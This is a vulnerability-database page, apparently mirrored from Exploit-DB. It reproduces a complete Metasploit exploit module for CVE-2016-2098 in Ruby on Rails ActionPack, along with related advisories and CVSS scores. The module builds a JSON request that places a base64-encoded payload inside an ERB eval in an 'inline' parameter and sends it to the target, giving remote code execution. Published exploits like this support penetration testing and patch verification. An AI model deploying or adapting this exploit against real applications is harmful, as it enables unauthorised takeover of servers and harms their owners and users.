Lucene search
K

Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)

🗓️ 11 Jul 2016 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)
11 Jul 201600:00
zdt
GithubExploit
Exploit for Improper Input Validation in Debian Debian_Linux
9 Feb 201816:16
githubexploit
Circl
CVE-2016-2098
11 Jul 201600:00
circl
CNVD
Rails Arbitrary Code Execution Vulnerability
11 Mar 201600:00
cnvd
Check Point Advisories
Ruby on Rails Remote Code Execution (CVE-2016-2098)
19 Jul 201600:00
checkpoint_advisories
CVE
CVE-2016-2098
7 Apr 201623:00
cve
Cvelist
CVE-2016-2098
7 Apr 201623:00
cvelist
Debian
[SECURITY] [DLA 604-1] ruby-actionpack-3.2 security update
28 Aug 201618:14
debian
Debian
[SECURITY] [DSA 3509-1] rails security update
9 Mar 201617:48
debian
Debian
[SECURITY] [DSA 3509-1] rails security update
9 Mar 201617:48
debian
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails ActionPack Inline ERB Code Execution',
      'Description'    => %q{
          This module exploits a remote code execution vulnerability in the
        inline request processor of the Ruby on Rails ActionPack component.
        This vulnerability allows an attacker to process ERB to the inline
        JSON processor, which is then rendered, permitting full RCE within
        the runtime, without logging an error condition.
      },
      'Author'         =>
        [
          'RageLtMan <rageltman[at]sempervictus>'
        ],
      'License'        => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2016-2098' ]
        ],
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        =>	[ ['Automatic', {} ] ],
      'DisclosureDate' => 'Mar 1 2016',
      'DefaultOptions' => {
        "PrependFork" => true
      },
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
        OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
      ], self.class)

  end

  def json_request
    code = Rex::Text.encode_base64(payload.encoded)
    return {
      datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
    }.to_json
  end

  def exploit
    print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
    send_request_cgi({
      'uri'     => normalize_uri(target_uri.path),
      'method'  => 'GET',
      'ctype'   => 'application/json',
      'headers' => {
        'Accept' => 'application/json'
      },
      'data'    => json_request
    }, 25)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jul 2016 00:00Current
7High risk
Vulners AI Score7
CVSS 37.3
CVSS 27.5
EPSS0.86668
48